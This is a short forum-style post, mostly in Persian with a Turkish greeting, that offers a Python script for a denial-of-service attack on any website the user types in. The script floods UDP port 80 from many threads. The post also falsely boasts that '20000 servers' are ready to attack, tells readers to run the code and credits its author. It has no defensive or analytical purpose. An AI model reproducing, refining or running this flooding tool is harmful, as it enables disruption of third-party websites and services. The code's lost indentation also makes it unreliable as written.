Merhaba beyler nasılsınız?
آقا اومدیم با یه کد پایتون
برای اولین بار در ایران
دیداس سایت
کدشون پاین میزارم:
print('______-------#------__________--------_-_-_-_')
print('20000 servers ready to attack ✓✓√')
import time
import socket
import sys
import _thread
import requests
response =requests.get('https://www.google.com')
print(response)
site = input("Site address => ")
thread_count = input("port=> ")
ip = socket.gethostbyname(site)
UDP_PORT = 80
MESSAGE = 'Hoten Emperor'
print("IP address:", ip)
print("You got port 80", UDP_PORT)
time.sleep(3)
def ddos(i):
while 1:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(bytes(MESSAGE,"UTF-8"), (ip, UDP_PORT))
print(" Didas attack")
for i in range(int(thread_count)):
try:
_thread.start_new_thread(ddos, ("Thread-" + str(i),))
except KeyboardInterrupt:
sys.exit(0)
while 1:
pass
خب این توی پایتون اجرا کنین
خدا نگهدار
سازنده :هوتن موسوی